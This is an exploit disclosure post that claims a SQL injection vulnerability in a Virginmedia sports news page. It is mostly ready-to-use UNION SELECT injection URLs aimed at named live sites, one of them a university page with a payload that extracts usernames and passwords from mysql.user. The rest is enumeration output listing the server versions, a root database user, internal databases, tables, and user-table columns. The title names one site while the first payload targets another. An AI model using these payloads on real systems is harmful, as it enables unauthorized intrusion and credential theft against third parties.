Virginmedia.com suffers from a remote SQL injection vulnerability.
291f205f5342c194347333962f7d5e45d1e6b8449edb438053842ffc58a0a38c
-----------------------------------------------------------------------------------------------
[+] Virginmedia.com suffers from a remote SQL injection vulnerability
[+] Author: Rohit Bansal
---------------------------------------------------------------------------------------
<https://www.iitkgp.ac.in/news/showannouncedescr.php?newsid=334+and+1=0+%20and%201=0%20Union%20Select%20%201%20,%20convert%28concat%28user,0x3a,password%29%20using%20latin1%29%20,3,4,5,6,7,8,9,10,11,12+from+mysql.user+-->Host
Information
Server = Apache/2.2.2 (Fedora)
Version = 5.0.22-standard-log
Powered by = PHP/5.1.6
Current User = root@192.168.3.11
Current Database = WorldSports2
Supports Union = yes
Union Columns = 10
Url| https://othersports.virginmedia.com/minorsports/news.php?id=25418
Vuln:
https://othersports.virginmedia.com/minorsports/news.php?id=25418+and+1=0+and
1=0 Union Select 1 ,2, UNHEX(HEX([visible])) ,4,5,6,7,8,9,10
Comment: --
Visible Column: 3
Hexed: True
Cookie:
Keyword:
Param:
Database:mysql
information_schema
AFC1
AusOpen
ESPN_News
ESPNdeportes
EuropeanLeagues
FAPL
Greyhounds
MatchLive2
MatchLive_Cup
OscarsQuizContent
PABrits
PAOscars
PAShowbiz
Platform
QuizContent
RolandGarros2007
Rugby
Three
US_Sports
WAPStats
WorldCup
WorldSports
WorldSports2
cricket
mysql
optus_tennis
pa_tennis
pccw_facup
pslvodacom
umusic
universal
us_open
Tables:user
columns_priv
db
func
help_category
help_keyword
help_relation
help_topic
host
proc
procs_priv
tables_priv
time_zone
time_zone_leap_second
time_zone_name
time_zone_transition
time_zone_transition_type
user
Columns: Table user
Username
Password
DateStamp
Status
userid
name
email
location
---------------------------------------------------------------------------------------
[+]^Rohit Bansal [rohitisback@gmail.com]
[+] Schap.org, Infysec,Evilfinger
---------------------------------------------------------------------------------------